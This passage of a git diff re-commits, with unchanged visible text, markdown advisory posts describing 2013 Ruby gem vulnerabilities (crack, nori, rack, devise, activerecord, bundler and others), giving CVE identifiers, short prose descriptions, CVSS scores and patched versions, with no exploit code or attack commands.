+  title: extlib Gem for Ruby Type Casting Parameter Parsing Remote Code Execution
+  date: 2013-01-08
+  description: |
+    extlib Gem for Ruby contains a flaw that is triggered when a type casting
+    error occurs during the parsing of parameters. This may allow a
+    context-dependent attacker to potentially execute arbitrary code.
+  cvss_v2: 9.3
+  patched_versions:
+  - ">= 0.9.16"
+---
diff --git a/advisories/_posts/2013-01-09-CVE-2013-1800.md b/advisories/_posts/2013-01-09-CVE-2013-1800.md
index 01fc749c..13b1a185 100644
--- a/advisories/_posts/2013-01-09-CVE-2013-1800.md
+++ b/advisories/_posts/2013-01-09-CVE-2013-1800.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2013-1800 (crack): CVE-2013-1800 rubygem-crack: YAML parameter parsing
-  vulnerability'
-comments: false
-categories:
-- crack
-advisory:
-  gem: crack
-  cve: 2013-1800
-  osvdb: 90742
-  ghsa: m7fq-cf8q-35q7
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-1800
-  title: 'CVE-2013-1800 rubygem-crack: YAML parameter parsing vulnerability'
-  date: 2013-01-09
-  description: |
-    The crack gem 0.3.1 and earlier for Ruby does not properly restrict casts
-    of string values, which might allow remote attackers to conduct object-injection
-    attacks and execute arbitrary code, or cause a denial of service (memory and CPU
-    consumption) by leveraging Action Pack support for (1) YAML type conversion or (2)
-    Symbol type conversion, a similar vulnerability to CVE-2013-0156.
-  cvss_v2: 7.5
-  patched_versions:
-  - ">= 0.3.2"
----
+---
+layout: advisory
+title: 'CVE-2013-1800 (crack): CVE-2013-1800 rubygem-crack: YAML parameter parsing
+  vulnerability'
+comments: false
+categories:
+- crack
+advisory:
+  gem: crack
+  cve: 2013-1800
+  osvdb: 90742
+  ghsa: m7fq-cf8q-35q7
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-1800
+  title: 'CVE-2013-1800 rubygem-crack: YAML parameter parsing vulnerability'
+  date: 2013-01-09
+  description: |
+    The crack gem 0.3.1 and earlier for Ruby does not properly restrict casts
+    of string values, which might allow remote attackers to conduct object-injection
+    attacks and execute arbitrary code, or cause a denial of service (memory and CPU
+    consumption) by leveraging Action Pack support for (1) YAML type conversion or (2)
+    Symbol type conversion, a similar vulnerability to CVE-2013-0156.
+  cvss_v2: 7.5
+  patched_versions:
+  - ">= 0.3.2"
+---
diff --git a/advisories/_posts/2013-01-10-CVE-2013-0285.md b/advisories/_posts/2013-01-10-CVE-2013-0285.md
index dc72a6ab..3f91b782 100644
--- a/advisories/_posts/2013-01-10-CVE-2013-0285.md
+++ b/advisories/_posts/2013-01-10-CVE-2013-0285.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2013-0285 (nori): Ruby Gem nori Parameter Parsing Remote Code Execution'
-comments: false
-categories:
-- nori
-advisory:
-  gem: nori
-  cve: 2013-0285
-  osvdb: 90196
-  ghsa: 4936-rj25-6wm6
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0285
-  title: Ruby Gem nori Parameter Parsing Remote Code Execution
-  date: 2013-01-10
-  description: |
-    The Ruby Gem nori has a parameter parsing error that may allow an attacker
-    to execute arbitrary code. This vulnerability has to do with type casting
-    during parsing, and is related to CVE-2013-0156.
-  cvss_v2: 7.5
-  patched_versions:
-  - "~> 1.0.3"
-  - "~> 1.1.4"
-  - ">= 2.0.2"
----
+---
+layout: advisory
+title: 'CVE-2013-0285 (nori): Ruby Gem nori Parameter Parsing Remote Code Execution'
+comments: false
+categories:
+- nori
+advisory:
+  gem: nori
+  cve: 2013-0285
+  osvdb: 90196
+  ghsa: 4936-rj25-6wm6
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0285
+  title: Ruby Gem nori Parameter Parsing Remote Code Execution
+  date: 2013-01-10
+  description: |
+    The Ruby Gem nori has a parameter parsing error that may allow an attacker
+    to execute arbitrary code. This vulnerability has to do with type casting
+    during parsing, and is related to CVE-2013-0156.
+  cvss_v2: 7.5
+  patched_versions:
+  - "~> 1.0.3"
+  - "~> 1.1.4"
+  - ">= 2.0.2"
+---
diff --git a/advisories/_posts/2013-01-11-CVE-2013-0175.md b/advisories/_posts/2013-01-11-CVE-2013-0175.md
index 1c81a2c1..dfa7ebd7 100644
--- a/advisories/_posts/2013-01-11-CVE-2013-0175.md
+++ b/advisories/_posts/2013-01-11-CVE-2013-0175.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2013-0175 (multi_xml): multi_xml Gem for Ruby XML Parameter Parsing Remote
-  Command Execution'
-comments: false
-categories:
-- multi_xml
-advisory:
-  gem: multi_xml
-  cve: 2013-0175
-  osvdb: 89148
-  ghsa: pchc-949f-53m5
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0175
-  title: multi_xml Gem for Ruby XML Parameter Parsing Remote Command Execution
-  date: 2013-01-11
-  description: |
-    The multi_xml Gem for Ruby contains a flaw that is triggered when an error
-    occurs during the parsing of the 'XML' parameter. With a crafted request
-    containing arbitrary symbol and yaml types, a remote attacker can execute
-    arbitrary commands.
-  patched_versions:
-  - ">= 0.5.2"
----
+---
+layout: advisory
+title: 'CVE-2013-0175 (multi_xml): multi_xml Gem for Ruby XML Parameter Parsing Remote
+  Command Execution'
+comments: false
+categories:
+- multi_xml
+advisory:
+  gem: multi_xml
+  cve: 2013-0175
+  osvdb: 89148
+  ghsa: pchc-949f-53m5
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0175
+  title: multi_xml Gem for Ruby XML Parameter Parsing Remote Command Execution
+  date: 2013-01-11
+  description: |
+    The multi_xml Gem for Ruby contains a flaw that is triggered when an error
+    occurs during the parsing of the 'XML' parameter. With a crafted request
+    containing arbitrary symbol and yaml types, a remote attacker can execute
+    arbitrary commands.
+  patched_versions:
+  - ">= 0.5.2"
+---
diff --git a/advisories/_posts/2013-01-13-CVE-2013-0184.md b/advisories/_posts/2013-01-13-CVE-2013-0184.md
index 1ca92db5..1c05b2de 100644
--- a/advisories/_posts/2013-01-13-CVE-2013-0184.md
+++ b/advisories/_posts/2013-01-13-CVE-2013-0184.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2013-0184 (rack): CVE-2013-0184 rubygem-rack: Rack::Auth::AbstractRequest
-  DoS'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2013-0184
-  osvdb: 89327
-  ghsa: v882-ccj6-jc48
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0184
-  title: 'CVE-2013-0184 rubygem-rack: Rack::Auth::AbstractRequest DoS'
-  date: 2013-01-13
-  description: |
-    Unspecified vulnerability in Rack::Auth::AbstractRequest in Rack 1.1.x
-    before 1.1.5, 1.2.x before 1.2.7, 1.3.x before 1.3.9, and 1.4.x before 1.4.4 allows
-    remote attackers to cause a denial of service via unknown vectors related to "symbolized
-    arbitrary strings."
-  cvss_v2: 4.3
-  patched_versions:
-  - "~> 1.1.5"
-  - "~> 1.2.7"
-  - "~> 1.3.9"
-  - ">= 1.4.4"
----
+---
+layout: advisory
+title: 'CVE-2013-0184 (rack): CVE-2013-0184 rubygem-rack: Rack::Auth::AbstractRequest
+  DoS'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2013-0184
+  osvdb: 89327
+  ghsa: v882-ccj6-jc48
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0184
+  title: 'CVE-2013-0184 rubygem-rack: Rack::Auth::AbstractRequest DoS'
+  date: 2013-01-13
+  description: |
+    Unspecified vulnerability in Rack::Auth::AbstractRequest in Rack 1.1.x
+    before 1.1.5, 1.2.x before 1.2.7, 1.3.x before 1.3.9, and 1.4.x before 1.4.4 allows
+    remote attackers to cause a denial of service via unknown vectors related to "symbolized
+    arbitrary strings."
+  cvss_v2: 4.3
+  patched_versions:
+  - "~> 1.1.5"
+  - "~> 1.2.7"
+  - "~> 1.3.9"
+  - ">= 1.4.4"
+---
diff --git a/advisories/_posts/2013-01-14-CVE-2013-1801.md b/advisories/_posts/2013-01-14-CVE-2013-1801.md
index 75803529..aa3f1ad5 100644
--- a/advisories/_posts/2013-01-14-CVE-2013-1801.md
+++ b/advisories/_posts/2013-01-14-CVE-2013-1801.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2013-1801 (httparty): httparty Gem for Ruby Type Casting Parameter Parsing
-  Remote Code Execution'
-comments: false
-categories:
-- httparty
-advisory:
-  gem: httparty
-  cve: 2013-1801
-  osvdb: 90741
-  ghsa: mgx3-27hr-mfgp
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-1801
-  title: httparty Gem for Ruby Type Casting Parameter Parsing Remote Code Execution
-  date: 2013-01-14
-  description: |
-    httparty Gem for Ruby contains a flaw that is triggered when a type casting
-    error occurs during the parsing of parameters. This may allow a
-    context-dependent attacker to potentially execute arbitrary code.
-  cvss_v2: 7.5
-  patched_versions:
-  - ">= 0.10.0"
----
+---
+layout: advisory
+title: 'CVE-2013-1801 (httparty): httparty Gem for Ruby Type Casting Parameter Parsing
+  Remote Code Execution'
+comments: false
+categories:
+- httparty
+advisory:
+  gem: httparty
+  cve: 2013-1801
+  osvdb: 90741
+  ghsa: mgx3-27hr-mfgp
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-1801
+  title: httparty Gem for Ruby Type Casting Parameter Parsing Remote Code Execution
+  date: 2013-01-14
+  description: |
+    httparty Gem for Ruby contains a flaw that is triggered when a type casting
+    error occurs during the parsing of parameters. This may allow a
+    context-dependent attacker to potentially execute arbitrary code.
+  cvss_v2: 7.5
+  patched_versions:
+  - ">= 0.10.0"
+---
diff --git a/advisories/_posts/2013-01-28-CVE-2013-0233.md b/advisories/_posts/2013-01-28-CVE-2013-0233.md
index ed16fd35..59199325 100644
--- a/advisories/_posts/2013-01-28-CVE-2013-0233.md
+++ b/advisories/_posts/2013-01-28-CVE-2013-0233.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2013-0233 (devise): Devise Database Type Conversion Crafted Request Parsing
-  Security Bypass'
-comments: false
-categories:
-- devise
-advisory:
-  gem: devise
-  cve: 2013-0233
-  osvdb: 89642
-  ghsa: jxhw-mg8m-2pj8
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0233
-  title: Devise Database Type Conversion Crafted Request Parsing Security Bypass
-  date: 2013-01-28
-  description: |
-    Devise contains a flaw that is triggered during when a type conversion error
-    occurs during the parsing of a malformed request. With a specially crafted
-    request, a remote attacker can bypass security restrictions.
-  cvss_v2: 6.8
-  patched_versions:
-  - "~> 1.5.4"
-  - "~> 2.0.5"
-  - "~> 2.1.3"
-  - ">= 2.2.3"
----
+---
+layout: advisory
+title: 'CVE-2013-0233 (devise): Devise Database Type Conversion Crafted Request Parsing
+  Security Bypass'
+comments: false
+categories:
+- devise
+advisory:
+  gem: devise
+  cve: 2013-0233
+  osvdb: 89642
+  ghsa: jxhw-mg8m-2pj8
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0233
+  title: Devise Database Type Conversion Crafted Request Parsing Security Bypass
+  date: 2013-01-28
+  description: |
+    Devise contains a flaw that is triggered during when a type conversion error
+    occurs during the parsing of a malformed request. With a specially crafted
+    request, a remote attacker can bypass security restrictions.
+  cvss_v2: 6.8
+  patched_versions:
+  - "~> 1.5.4"
+  - "~> 2.0.5"
+  - "~> 2.1.3"
+  - ">= 2.2.3"
+---
diff --git a/advisories/_posts/2013-01-28-CVE-2013-0333.md b/advisories/_posts/2013-01-28-CVE-2013-0333.md
index 7f52edd3..568d60eb 100644
--- a/advisories/_posts/2013-01-28-CVE-2013-0333.md
+++ b/advisories/_posts/2013-01-28-CVE-2013-0333.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2013-0333 (activesupport): CVE-2013-0333 rubygem-activesupport: json to
-  yaml parsing'
-comments: false
-categories:
-- activesupport
-- rails
-advisory:
-  gem: activesupport
-  framework: rails
-  cve: 2013-0333
-  osvdb: 89594
-  ghsa: xgr2-v94m-rc9g
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0333
-  title: 'CVE-2013-0333 rubygem-activesupport: json to yaml parsing'
-  date: 2013-01-28
-  description: |
-    lib/active_support/json/backends/yaml.rb in Ruby on Rails 2.3.x before
-    2.3.16 and 3.0.x before 3.0.20 does not properly convert JSON data to YAML data
-    for processing by a YAML parser, which allows remote attackers to execute arbitrary
-    code, conduct SQL injection attacks, or bypass authentication via crafted data that
-    triggers unsafe decoding, a different vulnerability than CVE-2013-0156.
-  cvss_v2: 9.3
-  patched_versions:
-  - "~> 2.3.16"
-  - ">= 3.0.20"
----
+---
+layout: advisory
+title: 'CVE-2013-0333 (activesupport): CVE-2013-0333 rubygem-activesupport: json to
+  yaml parsing'
+comments: false
+categories:
+- activesupport
+- rails
+advisory:
+  gem: activesupport
+  framework: rails
+  cve: 2013-0333
+  osvdb: 89594
+  ghsa: xgr2-v94m-rc9g
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0333
+  title: 'CVE-2013-0333 rubygem-activesupport: json to yaml parsing'
+  date: 2013-01-28
+  description: |
+    lib/active_support/json/backends/yaml.rb in Ruby on Rails 2.3.x before
+    2.3.16 and 3.0.x before 3.0.20 does not properly convert JSON data to YAML data
+    for processing by a YAML parser, which allows remote attackers to execute arbitrary
+    code, conduct SQL injection attacks, or bypass authentication via crafted data that
+    triggers unsafe decoding, a different vulnerability than CVE-2013-0156.
+  cvss_v2: 9.3
+  patched_versions:
+  - "~> 2.3.16"
+  - ">= 3.0.20"
+---
diff --git a/advisories/_posts/2013-02-06-CVE-2013-0256.md b/advisories/_posts/2013-02-06-CVE-2013-0256.md
index fff930cb..2e674728 100644
--- a/advisories/_posts/2013-02-06-CVE-2013-0256.md
+++ b/advisories/_posts/2013-02-06-CVE-2013-0256.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2013-0256 (rdoc): CVE-2013-0256 rubygem-rdoc: Cross-site scripting in
-  the documentation created by Darkfish Rdoc HTML generator / template'
-comments: false
-categories:
-- rdoc
-advisory:
-  gem: rdoc
-  cve: 2013-0256
-  osvdb: 90004
-  ghsa: v2r9-c84j-v7xm
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0256
-  title: 'CVE-2013-0256 rubygem-rdoc: Cross-site scripting in the documentation created
-    by Darkfish Rdoc HTML generator / template'
-  date: 2013-02-06
-  description: |
-    darkfish.js in RDoc 2.3.0 through 3.12 and 4.x before 4.0.0.preview2.1,
-    as used in Ruby, does not properly generate documents, which allows remote attackers
-    to conduct cross-site scripting (XSS) attacks via a crafted URL.
-  cvss_v2: 4.3
-  patched_versions:
-  - "~> 3.9.5"
-  - "~> 3.12.1"
-  - ">= 4.0"
----
+---
+layout: advisory
+title: 'CVE-2013-0256 (rdoc): CVE-2013-0256 rubygem-rdoc: Cross-site scripting in
+  the documentation created by Darkfish Rdoc HTML generator / template'
+comments: false
+categories:
+- rdoc
+advisory:
+  gem: rdoc
+  cve: 2013-0256
+  osvdb: 90004
+  ghsa: v2r9-c84j-v7xm
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0256
+  title: 'CVE-2013-0256 rubygem-rdoc: Cross-site scripting in the documentation created
+    by Darkfish Rdoc HTML generator / template'
+  date: 2013-02-06
+  description: |
+    darkfish.js in RDoc 2.3.0 through 3.12 and 4.x before 4.0.0.preview2.1,
+    as used in Ruby, does not properly generate documents, which allows remote attackers
+    to conduct cross-site scripting (XSS) attacks via a crafted URL.
+  cvss_v2: 4.3
+  patched_versions:
+  - "~> 3.9.5"
+  - "~> 3.12.1"
+  - ">= 4.0"
+---
diff --git a/advisories/_posts/2013-02-07-CVE-2013-0262.md b/advisories/_posts/2013-02-07-CVE-2013-0262.md
index c778982d..f002a7ee 100644
--- a/advisories/_posts/2013-02-07-CVE-2013-0262.md
+++ b/advisories/_posts/2013-02-07-CVE-2013-0262.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2013-0262 (rack): CVE-2013-0262 rubygem-rack: Path sanitization information
-  disclosure'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2013-0262
-  osvdb: 89938
-  ghsa: 85r7-w5mv-c849
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0262
-  title: 'CVE-2013-0262 rubygem-rack: Path sanitization information disclosure'
-  date: 2013-02-07
-  description: |
-    rack/file.rb (Rack::File) in Rack 1.5.x before 1.5.2 and 1.4.x before
-    1.4.5 allows attackers to access arbitrary files outside the intended root directory
-    via a crafted PATH_INFO environment variable, probably a directory traversal vulnerability
-    that is remotely exploitable, aka "symlink path traversals."
-  cvss_v2: 4.3
-  patched_versions:
-  - "~> 1.4.5"
-  - ">= 1.5.2"
----
+---
+layout: advisory
+title: 'CVE-2013-0262 (rack): CVE-2013-0262 rubygem-rack: Path sanitization information
+  disclosure'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2013-0262
+  osvdb: 89938
+  ghsa: 85r7-w5mv-c849
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0262
+  title: 'CVE-2013-0262 rubygem-rack: Path sanitization information disclosure'
+  date: 2013-02-07
+  description: |
+    rack/file.rb (Rack::File) in Rack 1.5.x before 1.5.2 and 1.4.x before
+    1.4.5 allows attackers to access arbitrary files outside the intended root directory
+    via a crafted PATH_INFO environment variable, probably a directory traversal vulnerability
+    that is remotely exploitable, aka "symlink path traversals."
+  cvss_v2: 4.3
+  patched_versions:
+  - "~> 1.4.5"
+  - ">= 1.5.2"
+---
diff --git a/advisories/_posts/2013-02-07-CVE-2013-0263.md b/advisories/_posts/2013-02-07-CVE-2013-0263.md
index fb4f1ab6..ecde0bbc 100644
--- a/advisories/_posts/2013-02-07-CVE-2013-0263.md
+++ b/advisories/_posts/2013-02-07-CVE-2013-0263.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2013-0263 (rack): CVE-2013-0263 rubygem-rack: Timing attack in cookie
-  sessions'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2013-0263
-  osvdb: 89939
-  ghsa: xc85-32mf-xpv8
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0263
-  title: 'CVE-2013-0263 rubygem-rack: Timing attack in cookie sessions'
-  date: 2013-02-07
-  description: |
-    Rack::Session::Cookie in Rack 1.5.x before 1.5.2, 1.4.x before 1.4.5,
-    1.3.x before 1.3.10, 1.2.x before 1.2.8, and 1.1.x before 1.1.6 allows remote attackers
-    to guess the session cookie, gain privileges, and execute arbitrary code via a timing
-    attack involving an HMAC comparison function that does not run in constant time.
-  cvss_v2: 5.1
-  patched_versions:
-  - "~> 1.1.6"
-  - "~> 1.2.8"
-  - "~> 1.3.10"
-  - "~> 1.4.5"
-  - ">= 1.5.2"
----
+---
+layout: advisory
+title: 'CVE-2013-0263 (rack): CVE-2013-0263 rubygem-rack: Timing attack in cookie
+  sessions'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2013-0263
+  osvdb: 89939
+  ghsa: xc85-32mf-xpv8
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0263
+  title: 'CVE-2013-0263 rubygem-rack: Timing attack in cookie sessions'
+  date: 2013-02-07
+  description: |
+    Rack::Session::Cookie in Rack 1.5.x before 1.5.2, 1.4.x before 1.4.5,
+    1.3.x before 1.3.10, 1.2.x before 1.2.8, and 1.1.x before 1.1.6 allows remote attackers
+    to guess the session cookie, gain privileges, and execute arbitrary code via a timing
+    attack involving an HMAC comparison function that does not run in constant time.
+  cvss_v2: 5.1
+  patched_versions:
+  - "~> 1.1.6"
+  - "~> 1.2.8"
+  - "~> 1.3.10"
+  - "~> 1.4.5"
+  - ">= 1.5.2"
+---
diff --git a/advisories/_posts/2013-02-11-CVE-2013-0276.md b/advisories/_posts/2013-02-11-CVE-2013-0276.md
index f44a87bb..224a069e 100644
--- a/advisories/_posts/2013-02-11-CVE-2013-0276.md
+++ b/advisories/_posts/2013-02-11-CVE-2013-0276.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2013-0276 (activerecord): CVE-2013-0276 rubygem-activerecord/rubygem-activemodel:
-  circumvention of attr_protected'
-comments: false
-categories:
-- activerecord
-- rails
-advisory:
-  gem: activerecord
-  framework: rails
-  cve: 2013-0276
-  osvdb: 90072
-  ghsa: gr44-7grc-37vq
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0276
-  title: 'CVE-2013-0276 rubygem-activerecord/rubygem-activemodel: circumvention of
-    attr_protected'
-  date: 2013-02-11
-  description: |
-    ActiveRecord in Ruby on Rails before 2.3.17, 3.1.x before 3.1.11, and
-    3.2.x before 3.2.12 allows remote attackers to bypass the attr_protected protection
-    mechanism and modify protected model attributes via a crafted request.
-  cvss_v2: 5.0
-  patched_versions:
-  - "~> 2.3.17"
-  - "~> 3.1.11"
-  - ">= 3.2.12"
----
+---
+layout: advisory
+title: 'CVE-2013-0276 (activerecord): CVE-2013-0276 rubygem-activerecord/rubygem-activemodel:
+  circumvention of attr_protected'
+comments: false
+categories:
+- activerecord
+- rails
+advisory:
+  gem: activerecord
+  framework: rails
+  cve: 2013-0276
+  osvdb: 90072
+  ghsa: gr44-7grc-37vq
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0276
+  title: 'CVE-2013-0276 rubygem-activerecord/rubygem-activemodel: circumvention of
+    attr_protected'
+  date: 2013-02-11
+  description: |
+    ActiveRecord in Ruby on Rails before 2.3.17, 3.1.x before 3.1.11, and
+    3.2.x before 3.2.12 allows remote attackers to bypass the attr_protected protection
+    mechanism and modify protected model attributes via a crafted request.
+  cvss_v2: 5.0
+  patched_versions:
+  - "~> 2.3.17"
+  - "~> 3.1.11"
+  - ">= 3.2.12"
+---
diff --git a/advisories/_posts/2013-02-11-CVE-2013-0277.md b/advisories/_posts/2013-02-11-CVE-2013-0277.md
index 6cf7d6a5..ae4700b1 100644
--- a/advisories/_posts/2013-02-11-CVE-2013-0277.md
+++ b/advisories/_posts/2013-02-11-CVE-2013-0277.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2013-0277 (activerecord): CVE-2013-0277 rubygem-activerecord: Serialized
-  Attributes YAML Vulnerability with Rails 2.3 and 3.0'
-comments: false
-categories:
-- activerecord
-- rails
-advisory:
-  gem: activerecord
-  framework: rails
-  cve: 2013-0277
-  osvdb: 90073
-  ghsa: fhj9-cjjh-27vm
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0277
-  title: 'CVE-2013-0277 rubygem-activerecord: Serialized Attributes YAML Vulnerability
-    with Rails 2.3 and 3.0'
-  date: 2013-02-11
-  description: |
-    ActiveRecord in Ruby on Rails before 2.3.17 and 3.x before 3.1.0 allows
-    remote attackers to cause a denial of service or execute arbitrary code via crafted
-    serialized attributes that cause the +serialize+ helper to deserialize arbitrary
-    YAML.
-  cvss_v2: 10.0
-  patched_versions:
-  - "~> 2.3.17"
-  - ">= 3.1.0"
----
+---
+layout: advisory
+title: 'CVE-2013-0277 (activerecord): CVE-2013-0277 rubygem-activerecord: Serialized
+  Attributes YAML Vulnerability with Rails 2.3 and 3.0'
+comments: false
+categories:
+- activerecord
+- rails
+advisory:
+  gem: activerecord
+  framework: rails
+  cve: 2013-0277
+  osvdb: 90073
+  ghsa: fhj9-cjjh-27vm
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0277
+  title: 'CVE-2013-0277 rubygem-activerecord: Serialized Attributes YAML Vulnerability
+    with Rails 2.3 and 3.0'
+  date: 2013-02-11
+  description: |
+    ActiveRecord in Ruby on Rails before 2.3.17 and 3.x before 3.1.0 allows
+    remote attackers to cause a denial of service or execute arbitrary code via crafted
+    serialized attributes that cause the +serialize+ helper to deserialize arbitrary
+    YAML.
+  cvss_v2: 10.0
+  patched_versions:
+  - "~> 2.3.17"
+  - ">= 3.1.0"
+---
diff --git a/advisories/_posts/2013-02-12-CVE-2013-0269.md b/advisories/_posts/2013-02-12-CVE-2013-0269.md
index e5b172e9..f320c3aa 100644
--- a/advisories/_posts/2013-02-12-CVE-2013-0269.md
+++ b/advisories/_posts/2013-02-12-CVE-2013-0269.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2013-0269 (json): CVE-2013-0269 rubygem-json: Denial of Service and SQL
-  Injection'
-comments: false
-categories:
-- json
-advisory:
-  gem: json
-  cve: 2013-0269
-  osvdb: 101137
-  ghsa: x457-cw4h-hq5f
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0269
-  title: 'CVE-2013-0269 rubygem-json: Denial of Service and SQL Injection'
-  date: 2013-02-12
-  description: |
-    The JSON gem before 1.5.5, 1.6.x before 1.6.8, and 1.7.x before 1.7.7
-    for Ruby allows remote attackers to cause a denial of service (resource consumption)
-    or bypass the mass assignment protection mechanism via a crafted JSON document that
-    triggers the creation of arbitrary Ruby symbols or certain internal objects, as
-    demonstrated by conducting a SQL injection attack against Ruby on Rails, aka "Unsafe
-    Object Creation Vulnerability."
-  cvss_v2: 9.0
-  patched_versions:
-  - "~> 1.5.5"
-  - "~> 1.6.8"
-  - ">= 1.7.7"
----
+---
+layout: advisory
+title: 'CVE-2013-0269 (json): CVE-2013-0269 rubygem-json: Denial of Service and SQL
+  Injection'
+comments: false
+categories:
+- json
+advisory:
+  gem: json
+  cve: 2013-0269
+  osvdb: 101137
+  ghsa: x457-cw4h-hq5f
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0269
+  title: 'CVE-2013-0269 rubygem-json: Denial of Service and SQL Injection'
+  date: 2013-02-12
+  description: |
+    The JSON gem before 1.5.5, 1.6.x before 1.6.8, and 1.7.x before 1.7.7
+    for Ruby allows remote attackers to cause a denial of service (resource consumption)
+    or bypass the mass assignment protection mechanism via a crafted JSON document that
+    triggers the creation of arbitrary Ruby symbols or certain internal objects, as
+    demonstrated by conducting a SQL injection attack against Ruby on Rails, aka "Unsafe
+    Object Creation Vulnerability."
+  cvss_v2: 9.0
+  patched_versions:
+  - "~> 1.5.5"
+  - "~> 1.6.8"
+  - ">= 1.7.7"
+---
diff --git a/advisories/_posts/2013-02-12-OSVDB-115090.md b/advisories/_posts/2013-02-12-OSVDB-115090.md
index 29d0adb9..f8abd992 100644
--- a/advisories/_posts/2013-02-12-OSVDB-115090.md
+++ b/advisories/_posts/2013-02-12-OSVDB-115090.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'OSVDB-115090 (bundler): Bundler Gem for Ruby Missing SSL Certificate Validation
-  MitM Spoofing'
-comments: false
-categories:
-- bundler
-advisory:
-  gem: bundler
-  osvdb: 115090
-  url: https://github.com/rubygems/bundler/releases/tag/v1.3.0.pre.8
-  title: Bundler Gem for Ruby Missing SSL Certificate Validation MitM Spoofing
-  date: 2013-02-12
-  description: |
-    Bundler Gem for Ruby contains a flaw as SSL certificates are not properly
-    validated. By spoofing the SSL server via a certificate that appears valid,
-    an attacker with the ability to intercept network traffic (e.g. MiTM, DNS
-    cache poisoning) can disclose and optionally manipulate transmitted data.
-  patched_versions:
-  - ">= 1.3.0.pre.8"
-  related:
-    url:
-    - https://github.com/rubygems/bundler/releases/tag/v1.3.0.pre.8
-    - https://my.diffend.io/gems/bundler/1.3.0.pre.7/1.3.0.pre.8
-    - https://my.diffend.io/gems/bundler/versions/1.0.0.beta.8
-    - http://www.osvdb.org/show/osvdb/115090
----
+---
+layout: advisory
+title: 'OSVDB-115090 (bundler): Bundler Gem for Ruby Missing SSL Certificate Validation
+  MitM Spoofing'
+comments: false
+categories:
+- bundler
+advisory:
+  gem: bundler
+  osvdb: 115090
+  url: https://github.com/rubygems/bundler/releases/tag/v1.3.0.pre.8
+  title: Bundler Gem for Ruby Missing SSL Certificate Validation MitM Spoofing
+  date: 2013-02-12
+  description: |
+    Bundler Gem for Ruby contains a flaw as SSL certificates are not properly
+    validated. By spoofing the SSL server via a certificate that appears valid,
+    an attacker with the ability to intercept network traffic (e.g. MiTM, DNS
+    cache poisoning) can disclose and optionally manipulate transmitted data.
+  patched_versions:
+  - ">= 1.3.0.pre.8"
+  related:
+    url:
+    - https://github.com/rubygems/bundler/releases/tag/v1.3.0.pre.8
+    - https://my.diffend.io/gems/bundler/1.3.0.pre.7/1.3.0.pre.8
+    - https://my.diffend.io/gems/bundler/versions/1.0.0.beta.8
+    - http://www.osvdb.org/show/osvdb/115090
+---
diff --git a/advisories/_posts/2013-02-12-OSVDB-115091.md b/advisories/_posts/2013-02-12-OSVDB-115091.md
index 5e306919..aa5ef63a 100644
--- a/advisories/_posts/2013-02-12-OSVDB-115091.md
+++ b/advisories/_posts/2013-02-12-OSVDB-115091.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'OSVDB-115091 (bundler): Bundler Gem for Ruby Redirection Remote HTTP Basic
-  Authentication Credential Disclosure'
-comments: false
-categories:
-- bundler
-advisory:
-  gem: bundler
-  osvdb: 115091
-  url: https://github.com/rubygems/bundler/releases/tag/v1.3.0.pre.8
-  title: Bundler Gem for Ruby Redirection Remote HTTP Basic Authentication Credential
-    Disclosure
-  date: 2013-02-12
-  description: |
-    Bundler Gem for Ruby contains a flaw that is triggered during the
-    redirection to other hosts. This may allow a remote attacker to
-    gain access to HTTP basic authentication credential information.
-  patched_versions:
-  - ">= 1.3.0.pre.8"
-  related:
-    url:
-    - https://github.com/rubygems/bundler/releases/tag/v1.3.0.pre.8
-    - https://my.diffend.io/gems/bundler/1.3.0.pre.7/1.3.0.pre.8
-    - https://my.diffend.io/gems/bundler/versions/1.0.0.beta.8
-    - http://www.osvdb.org/show/osvdb/115091
----
+---
+layout: advisory
